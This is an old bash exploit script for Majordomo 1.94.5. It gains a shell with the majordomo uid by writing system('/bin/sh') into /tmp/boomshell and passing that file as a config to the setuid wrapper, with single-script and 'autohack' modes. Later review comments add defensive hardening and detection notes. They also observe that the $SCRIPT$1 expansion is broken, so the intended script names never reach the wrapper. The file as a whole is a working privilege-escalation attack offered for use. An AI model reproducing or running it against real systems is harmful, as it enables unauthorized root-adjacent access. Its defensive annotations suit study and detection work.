#!/bin/bash
#
# Majordomo v1.94.5 local linux exploit
# script by slash / buffer0verfl0w security
# <tcsh@b0f.i-p.com> <b0f.freebsd.lublin.pl>
#
# -- DESCRIPTION
# Majordomo is a perl script for managing mailing lists. The package
# comes with several scripts and a program written in C (wrapper) that
# runs setuid to ensure that majordomo performs all the work with proper
# permissions. This wrapper is installed by default as root, mode 4755 and
# group as the one used for majordomo. What does this mean? If you can fool
# majordomo into running arbitrary commands, they'll be run with uid and gid
# equal to the one used for majordomo.
#
# Almost all of these scripts accept an optional configuration from the
# command line, which is loaded and evaluated via perl's require keyword.
# This file is nothing else than perl code, thus creating a special file
# with our commands and pointing it as the configuration of any of the
# affected scripts will result in the following (this applies to majordomo
# 1.94.5):
#
#    [slash@linux~]$ cat /tmp/boomshell
#    system("/bin/sh");
#    [slash@linux~]$ id
#    uid=1000(fgsch) gid=1000(fgsch) groups=1000(fgsch), 0(wheel), 11(core)
#    [slash@linux~]$ ./wrapper bounce-remind -C /tmp/boomshell
#    [slash@linux~]$ id
#    uid=41(majordom) gid=41(majordom) groups=1000(fgsch), 0(wheel), 11(core)
#
# -- EXPLOIT
# You can run this exploit in two modes: 1) to run all scripts (recommended)
#                                        2) to run a single script
# If you need help with the program, run it with the '-h' argument, which will
# show you the help screen. It's also possible that you will need to change
# the path to your Majordomo wrapper (WRAPPER).
#
# Greets go to my friends at #!b0f, TESO, funkySh (thnx.), ADM, Lam3rZ, 
# lcamtuf and all of the people who know me.
#
# Copyright (c) 2000 slash / buffer0verfl0w security

clear

# Path to the setuid Majordomo wrapper binary; adjust to match the local install.
# Review note (defensive): the header above states the wrapper is installed
# setuid, mode 4755, i.e. executable by every local user. Limiting execute
# permission on the wrapper to the accounts that actually need it narrows
# who can reach the config-loading path described in the header.
WRAPPER=/usr/lib/majordomo/wrapper
# File passed to the Majordomo scripts with -C. The name is fixed and lives in
# /tmp; nothing in this file removes it afterwards, so it remains on disk as an
# artifact. A wrapper invocation whose -C argument names a file outside
# Majordomo's own configuration is the observable to audit for.
BOOMSHELL=/tmp/boomshell

# Names of the Majordomo scripts that the header describes as accepting a
# configuration file on the command line.
# NOTE(review): the functions below write `$SCRIPT$1` / `$SCRIPT$L`, which is
# `$SCRIPT` followed by a number, not a reference to SCRIPT1..SCRIPT7; as far
# as this file shows, these seven variables are assigned but never read.
SCRIPT1=bounce-remind
SCRIPT2=archive2.pl
SCRIPT3=config-test
SCRIPT4=digest
SCRIPT5=majordomo
SCRIPT6=request-answer
SCRIPT7=resend

# BOOM: write the one-line Perl statement into $BOOMSHELL.
# Globals:   BOOMSHELL (read)
# Arguments: none
# The redirection is `>>`, so the file is created if missing and appended to
# otherwise; it is never truncated or deleted here, so every call adds one
# more identical line and the file is left behind after the run.
# $BOOMSHELL is expanded unquoted; with the default value this makes no
# difference, but a value containing whitespace would be word-split.
BOOM ()
{
cat >> $BOOMSHELL << EOF
system("/bin/sh");
EOF
}

# RUNME: print two status lines, call BOOM, then run the wrapper once.
# Globals:   WRAPPER, BOOMSHELL (read); SCRIPT (read, see note)
# Arguments: $1 - index 1-7 supplied by the case dispatcher at the end of
#                 the file
# NOTE(review): `$SCRIPT$1` is the expansion of `$SCRIPT` followed by `$1`; it
# does not look up SCRIPT1..SCRIPT7. SCRIPT is not assigned anywhere in this
# file, so unless it is inherited from the environment both the status line
# and the wrapper's first argument carry the bare index. Detection logic
# should therefore key on the wrapper being run with -C pointing at a file
# outside Majordomo's own configuration, not on the script name.
RUNME ()
{
echo "Using $SCRIPT$1..."
# BOOM appends to $BOOMSHELL each time it is called (it redirects with `>>`).
echo "Creating boomshell..." ; BOOM
# Every expansion on this line is unquoted and subject to word splitting.
$WRAPPER $SCRIPT$1 -C $BOOMSHELL
}

   # Banner and usage line; printed on every run, before the argument in $1
   # is examined by the case statement at the end of the file.
   printf '%s\n' \
      "Majordomo v1.94.5 linux exploit" \
      "Coded by slash / buffer0verfl0w security " \
      "<tcsh@b0f.i-p.com> <b0f.freebsd.lublin.pl>" \
      "" \
      "Usage: ./majordomo [-h help] [-a autohack] [<single script>]"

# HELP: print the usage summary and the meaning of each argument, then exit.
# Arguments: none
# Outputs:   four lines on stdout
# Returns:   does not return; calls `exit` with no argument.
HELP ()
{
   printf '%s\n' \
      "Usage: ./majordomo [-h help] [-a autohack] [<single script>]" \
      "	-h help - shows this screen" \
      "	-a autohack - this will try all of the majordomo scripts" \
      "   <single script> - this will try just the script You specify"
   exit
}

# Auto hack

# AUTO: call BOOM once, run the wrapper seven times in a row, then exit.
# Globals:   WRAPPER, BOOMSHELL (read); SCRIPT (read, see note); L (written)
# Arguments: none
# Returns:   does not return; calls `exit` with no argument.
# NOTE(review): `$SCRIPT$L` is `$SCRIPT` followed by the counter, not a lookup
# of SCRIPT1..SCRIPT7. SCRIPT is not assigned in this file, so unless it comes
# from the environment the wrapper is started with the arguments 1 through 7.
# On a monitored host this shows up as seven back-to-back executions of the
# setuid wrapper by one user, each with -C naming the same file under /tmp.
AUTO ()
{
  echo "Trying all scripts..."
  echo "Creating $BOOMSHELL..."
# BOOM appends to $BOOMSHELL; it is called once here, before the loop.
BOOM 
# L is a global loop counter (no `local`), starting at 1.
L=1

  # The wrapper's exit status is not checked; the loop always runs 7 times.
  while [ $L -le 7 ]  ; do
   $WRAPPER $SCRIPT$L -C $BOOMSHELL ; let L=$L+1
  done
 exit
}

# NOCOMM: fallback for a missing or unrecognised argument. Lists the seven
# accepted script names plus one example command line, then exits.
# Arguments: none
# Outputs:   ten lines on stdout
# Returns:   does not return; calls `exit` with no argument.
NOCOMM ()
{
	printf '%s\n' \
		"You have to suply the script name. Try one of these:" \
		"bounce-remind" \
		"archive2.pl" \
		"config-test" \
		"digest" \
		"majordomo" \
		"request-answer" \
		"resend" \
		"" \
		"Ex. bash# ./majordomo bounce-remind"
	exit
}
       # Dispatch on the first command-line argument. Each recognised script
       # name is mapped to its index and handed to RUNME; -h and -a select
       # HELP and AUTO. Anything else, including no argument at all, falls
       # through to NOCOMM. Arguments after the first are ignored.
       # NOTE(review): RUNME receives only the index; it never reads the
       # matching SCRIPT1..SCRIPT7 variable (it expands `$SCRIPT$1`).
       case $1 in
        bounce-remind) RUNME 1;;
        archive2.pl) RUNME 2;;
        config-test) RUNME 3;;
        digest) RUNME 4;;
        majordomo) RUNME 5;;
        request-answer) RUNME 6;;  
        resend) RUNME 7;;
        -h) HELP;;
        -a) AUTO;;
        *) NOCOMM;;
       esac
 

